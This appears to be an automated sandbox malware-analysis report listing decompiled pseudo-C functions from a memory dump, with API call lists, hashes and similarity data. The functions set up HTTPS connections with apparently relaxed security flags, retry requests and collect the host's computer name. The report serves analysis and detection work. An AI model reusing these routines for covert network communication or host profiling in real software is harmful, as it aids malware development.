                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 344208780-0
                                                                                                            • Opcode ID: f3e17f63cfd329979f9691884c8d3903b40b945714a5e9a85d2354baa0ac5554
                                                                                                            • Instruction ID: 78134ff6954150a1c9fd8a8d5d584d8634b4aa2d84af6dc6a56b3cb304d1bb44
                                                                                                            • Opcode Fuzzy Hash: f3e17f63cfd329979f9691884c8d3903b40b945714a5e9a85d2354baa0ac5554
                                                                                                            • Instruction Fuzzy Hash: F8314C76902209EFCB00DF98D8C49EEBBB9FF59300B10846EF50697250D7349A41CF65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03037749, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 23%
                                                                                                            			E03037749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t34;
				long _t36;
				unsigned int _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E03031922(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E03034AAB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E03031922(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x6ee0f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E03034AAB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E03031922(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0x303d2e0; // 0x22da5a8
										_t19 = _t42 + 0x303e758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E03034AAB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                                                                                                            0x03037749
                                                                                                            0x03037758
                                                                                                            0x0303775e
                                                                                                            0x0303788f
                                                                                                            0x0303788f
                                                                                                            0x03037764
                                                                                                            0x03037764
                                                                                                            0x0303776a
                                                                                                            0x0303776c
                                                                                                            0x0303777c
                                                                                                            0x0303777c
                                                                                                            0x0303776e
                                                                                                            0x0303776e
                                                                                                            0x03037777
                                                                                                            0x03037777
                                                                                                            0x03037770
                                                                                                            0x03037770
                                                                                                            0x03037775
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037775
                                                                                                            0x0303776e
                                                                                                            0x0303778a
                                                                                                            0x03037791
                                                                                                            0x03037794
                                                                                                            0x0303779c
                                                                                                            0x00000000
                                                                                                            0x030377a2
                                                                                                            0x030377a4
                                                                                                            0x030377a9
                                                                                                            0x030377ae
                                                                                                            0x00000000
                                                                                                            0x030377b4
                                                                                                            0x030377b4
                                                                                                            0x030377bd
                                                                                                            0x030377d4
                                                                                                            0x030377e0
                                                                                                            0x030377e9
                                                                                                            0x030377ec
                                                                                                            0x030377f4
                                                                                                            0x00000000
                                                                                                            0x030377fa
                                                                                                            0x030377fd
                                                                                                            0x03037809
                                                                                                            0x0303780f
                                                                                                            0x00000000
                                                                                                            0x03037811
                                                                                                            0x03037814
                                                                                                            0x0303781d
                                                                                                            0x0303781d
                                                                                                            0x03037827
                                                                                                            0x0303782e
                                                                                                            0x03037831
                                                                                                            0x03037836
                                                                                                            0x0303783b
                                                                                                            0x00000000
                                                                                                            0x0303783d
                                                                                                            0x0303783f
                                                                                                            0x0303784b
                                                                                                            0x0303784e
                                                                                                            0x03037856
                                                                                                            0x03037858
                                                                                                            0x03037869
                                                                                                            0x03037869
                                                                                                            0x0303786b
                                                                                                            0x0303786f
                                                                                                            0x03037870
                                                                                                            0x03037872
                                                                                                            0x03037879
                                                                                                            0x00000000
                                                                                                            0x0303787b
                                                                                                            0x0303787b
                                                                                                            0x0303787f
                                                                                                            0x03037880
                                                                                                            0x03037882
                                                                                                            0x03037889
                                                                                                            0x00000000
                                                                                                            0x0303788b
                                                                                                            0x0303788b
                                                                                                            0x0303788b
                                                                                                            0x03037889
                                                                                                            0x03037879
                                                                                                            0x0303783b
                                                                                                            0x0303780f
                                                                                                            0x030377bf
                                                                                                            0x030377ca
                                                                                                            0x030377ce
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x030377ce
                                                                                                            0x030377bd
                                                                                                            0x030377ae
                                                                                                            0x0303779c
                                                                                                            0x03037898

                                                                                                            APIs
                                                                                                              • Part of subcall function 03031922: lstrlen.KERNEL32(?,00000000,05319B38,00000000,030374FF,05319D16,?,?,?,?,?,69B25F44,00000005,0303D00C), ref: 03031929
                                                                                                              • Part of subcall function 03031922: mbstowcs.NTDLL ref: 03031952
                                                                                                              • Part of subcall function 03031922: memset.NTDLL ref: 03031964
                                                                                                            • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,0303544C,00000000,00000000,05319618,?,?,03032A8A,?,05319618,0000EA60), ref: 03037764
                                                                                                            • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,0303544C,00000000,00000000,05319618,?,?,03032A8A,?,05319618,0000EA60), ref: 0303788F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 4097109750-1701360479
                                                                                                            • Opcode ID: 65c31a2f4c71bf636c6c631cf4d3865e0ac14f7b5fe6e0e4a4086f41f19ca153
                                                                                                            • Instruction ID: bbe0d65b5760c6335f847b0cb095732b95ef0853776cae9d9ef56d3bd8fd9eb0
                                                                                                            • Opcode Fuzzy Hash: 65c31a2f4c71bf636c6c631cf4d3865e0ac14f7b5fe6e0e4a4086f41f19ca153
                                                                                                            • Instruction Fuzzy Hash: 5E415EB6101208FFEB35EFA4CC85EAA7BFDEB49B40F044529F64299050E771DA45CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03035141, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 47%
                                                                                                            			E03035141(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E030375F6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x303c2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                                                                                            0x03035145
                                                                                                            0x03035152
                                                                                                            0x03035154
                                                                                                            0x03035155
                                                                                                            0x0303515d
                                                                                                            0x0303515d
                                                                                                            0x03035161
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03035158
                                                                                                            0x03035159
                                                                                                            0x0303515c
                                                                                                            0x0303515c
                                                                                                            0x03035169
                                                                                                            0x0303516e
                                                                                                            0x03035173
                                                                                                            0x0303517b
                                                                                                            0x03035181
                                                                                                            0x03035183
                                                                                                            0x03035186
                                                                                                            0x0303518a
                                                                                                            0x0303518c
                                                                                                            0x0303518f
                                                                                                            0x0303518f
                                                                                                            0x03035190
                                                                                                            0x03035192
                                                                                                            0x0303518f
                                                                                                            0x0303519c
                                                                                                            0x0303519f
                                                                                                            0x030351a2
                                                                                                            0x030351a3
                                                                                                            0x030351a5
                                                                                                            0x030351ac
                                                                                                            0x030351ac
                                                                                                            0x030351b8

                                                                                                            APIs
                                                                                                            • StrChrA.SHLWAPI(?,00000020,00000000,053195AC,03035390,?,0303935C,?,053195AC,?,03035390), ref: 0303515D
                                                                                                            • StrTrimA.SHLWAPI(?,0303C2A4,00000002,?,0303935C,?,053195AC,?,03035390), ref: 0303517B
                                                                                                            • StrChrA.SHLWAPI(?,00000020,?,0303935C,?,053195AC,?,03035390), ref: 03035186
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Trim
                                                                                                            • String ID:
                                                                                                            • API String ID: 3043112668-0
                                                                                                            • Opcode ID: 68da7e6125aa707d18c6be83a9d9caf656d9edfe137342ea0d75cfd6d14717b7
                                                                                                            • Instruction ID: c87b0166ae270a56e0c281c66b2f8f8fdce1fb6e414e47cf30a3af2dddcfcbbe
                                                                                                            • Opcode Fuzzy Hash: 68da7e6125aa707d18c6be83a9d9caf656d9edfe137342ea0d75cfd6d14717b7
                                                                                                            • Instruction Fuzzy Hash: 2B017C717063466FE7609A6E8C44F6BBBDDEFC7640F185011FA55CB2A2EA70D84286A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03031F72, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 32%
                                                                                                            			E03031F72(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6ee0e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                                                                            0x03031f79
                                                                                                            0x03031f86
                                                                                                            0x03031f88
                                                                                                            0x03031f8b
                                                                                                            0x03031fd0
                                                                                                            0x03031fd8
                                                                                                            0x03031fde
                                                                                                            0x03031fe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03031f8f
                                                                                                            0x03031f95
                                                                                                            0x03031f9d
                                                                                                            0x03031fce
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03031f9f
                                                                                                            0x03031f9f
                                                                                                            0x03031fa9
                                                                                                            0x03031fad
                                                                                                            0x03031fb6
                                                                                                            0x03031fbe
                                                                                                            0x03031fec
                                                                                                            0x03031fc0
                                                                                                            0x03031fc0
                                                                                                            0x00000000
                                                                                                            0x03031fc0
                                                                                                            0x03031fbe
                                                                                                            0x03031fa9
                                                                                                            0x03031fef
                                                                                                            0x03031ff6
                                                                                                            0x03031ff6
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32 ref: 03031F8F
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,030346B9,00000000,?,?), ref: 03031FE6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID: @MxtNxt
                                                                                                            • API String ID: 1452528299-1701360479
                                                                                                            • Opcode ID: 6af77312e4f84f01576d26f86f7c0483f9a91161b0fcaceb6f2afc19aa7cd263
                                                                                                            • Instruction ID: b7a4a169d80df35aad22ea27857a2d8ae169f1c154af579e69b796ff5c1b895a
                                                                                                            • Opcode Fuzzy Hash: 6af77312e4f84f01576d26f86f7c0483f9a91161b0fcaceb6f2afc19aa7cd263
                                                                                                            • Instruction Fuzzy Hash: AC015231906208FFDF14EFA6D848DAEBFBCEB8A750F108466E501E2255D7748644DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03034AAB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034AAB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x303d270, 0, _a4); // executed
				return _t2;
			}




                                                                                                            0x03034ab7
                                                                                                            0x03034abd

                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3298025750-1536154274
                                                                                                            • Opcode ID: 2f60205bf70e711e9d8d3b0556355d17fb76a6b03db57200607de355dc50cc1e
                                                                                                            • Instruction ID: d392154089460230fc00ef9000aa9f172a3bbcdd352611c335bba0c261e1a7b9
                                                                                                            • Opcode Fuzzy Hash: 2f60205bf70e711e9d8d3b0556355d17fb76a6b03db57200607de355dc50cc1e
                                                                                                            • Instruction Fuzzy Hash: A3B012B5105100ABDE21AB50DF04F05BA35B760700F004011B30450078C2358430FB15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303144D, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E0303144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E03033DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x303d2e0; // 0x22da5a8
						_t20 = _t68 + 0x303e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E030347EB(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                            0x03031453
                                                                                                            0x03031456
                                                                                                            0x03031466
                                                                                                            0x0303146f
                                                                                                            0x03031473
                                                                                                            0x03031541
                                                                                                            0x03031547
                                                                                                            0x03031547
                                                                                                            0x0303148d
                                                                                                            0x03031492
                                                                                                            0x03031496
                                                                                                            0x0303149c
                                                                                                            0x030314a1
                                                                                                            0x030314a8
                                                                                                            0x030314b7
                                                                                                            0x030314b7
                                                                                                            0x030314bb
                                                                                                            0x030314bd
                                                                                                            0x030314c9
                                                                                                            0x030314d4
                                                                                                            0x030314df
                                                                                                            0x030314e3
                                                                                                            0x030314ed
                                                                                                            0x030314f1
                                                                                                            0x030314f3
                                                                                                            0x030314f8
                                                                                                            0x030314ff
                                                                                                            0x0303150f
                                                                                                            0x0303150f
                                                                                                            0x030314f8
                                                                                                            0x030314f1
                                                                                                            0x03031511
                                                                                                            0x03031516
                                                                                                            0x0303151b
                                                                                                            0x0303151b
                                                                                                            0x0303151e
                                                                                                            0x03031527
                                                                                                            0x0303152c
                                                                                                            0x0303152c
                                                                                                            0x03031531
                                                                                                            0x03031536
                                                                                                            0x03031536
                                                                                                            0x03031531
                                                                                                            0x030314bb
                                                                                                            0x03031538
                                                                                                            0x0303153e
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                              • Part of subcall function 03033DA0: SysAllocString.OLEAUT32(80000002), ref: 03033DFD
                                                                                                              • Part of subcall function 03033DA0: SysFreeString.OLEAUT32(00000000), ref: 03033E63
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0303152C
                                                                                                            • SysFreeString.OLEAUT32(030328D9), ref: 03031536
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: String$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 986138563-0
                                                                                                            • Opcode ID: a4509389748c38fef016383d993a72a1eff5eb4812d68f3d27246f311ee1afe5
                                                                                                            • Instruction ID: 51496395257599de01cac45477f6b8091f066d6394a9e6ad7fb80179ae9d2d27
                                                                                                            • Opcode Fuzzy Hash: a4509389748c38fef016383d993a72a1eff5eb4812d68f3d27246f311ee1afe5
                                                                                                            • Instruction Fuzzy Hash: 7C310776501119EFCB15EF69C888C9BBBBDFFCA7407144698F8169B210E631DD51CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03034B28, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E030363F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x303d270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E03031E47(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                                                                            0x03034b28
                                                                                                            0x03034b30
                                                                                                            0x03034b47
                                                                                                            0x03034b62
                                                                                                            0x03034b66
                                                                                                            0x03034b6b
                                                                                                            0x03034b6d
                                                                                                            0x03034b7f
                                                                                                            0x03034b8b
                                                                                                            0x03034b6f
                                                                                                            0x03034b6f
                                                                                                            0x03034b74
                                                                                                            0x03034b79
                                                                                                            0x03034b79
                                                                                                            0x03034b6d
                                                                                                            0x03034b91
                                                                                                            0x03034b95
                                                                                                            0x03034b95
                                                                                                            0x03034b3c
                                                                                                            0x03034b41
                                                                                                            0x03034b45
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                              • Part of subcall function 03031E47: SysFreeString.OLEAUT32(00000000), ref: 03031EAA
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,0303506B,?,004F0053,05319370,00000000,?), ref: 03034B8B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Free$HeapString
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3806048269-1536154274
                                                                                                            • Opcode ID: 4e321e3110935a3ba88ac20f76ac5cc1e13d996a9d48f3c9eb75b5443ad59b0f
                                                                                                            • Instruction ID: 206089b2445ad122bbf2f3ad75636dc1e9c1a03e9c80828b815397fc6c1a3153
                                                                                                            • Opcode Fuzzy Hash: 4e321e3110935a3ba88ac20f76ac5cc1e13d996a9d48f3c9eb75b5443ad59b0f
                                                                                                            • Instruction Fuzzy Hash: 4F012832502619BBDB22DE55CC01FEA7BA9EF49790F088024FE089E120D731C920EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 030358AE, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(0303258B), ref: 030358C7
                                                                                                              • Part of subcall function 0303144D: SysFreeString.OLEAUT32(?), ref: 0303152C
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03035908
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: String$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 986138563-0
                                                                                                            • Opcode ID: 3e3b198c3ec4a14b28c38a78202ee1dc81d6659612bd559db67c4a0cb95cc572
                                                                                                            • Instruction ID: f340798d60b08f089f2994e2ef102edfa37639ce83713f71a7735d457f2e0822
                                                                                                            • Opcode Fuzzy Hash: 3e3b198c3ec4a14b28c38a78202ee1dc81d6659612bd559db67c4a0cb95cc572
                                                                                                            • Instruction Fuzzy Hash: 43016D3651215ABFDB41EFA9DC08DEF7BBCEF49610B014122F905E7120D7309A25CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03031BBF, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E03031BBF(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E030375F6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E03034AAB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                            0x03031bc4
                                                                                                            0x03031bcf
                                                                                                            0x03031bd1
                                                                                                            0x03031bd7
                                                                                                            0x03031bd9
                                                                                                            0x03031bde
                                                                                                            0x03031be7
                                                                                                            0x03031beb
                                                                                                            0x03031bf4
                                                                                                            0x03031bf8
                                                                                                            0x03031c07
                                                                                                            0x03031bfa
                                                                                                            0x03031bfb
                                                                                                            0x03031c00
                                                                                                            0x03031c00
                                                                                                            0x03031bf8
                                                                                                            0x03031beb
                                                                                                            0x03031c10

                                                                                                            APIs
                                                                                                            • GetComputerNameExA.KERNEL32(00000003,00000000,03034531,747DF710,00000000,?,?,03034531), ref: 03031BD7
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • GetComputerNameExA.KERNEL32(00000003,00000000,03034531,03034532,?,?,03034531), ref: 03031BF4
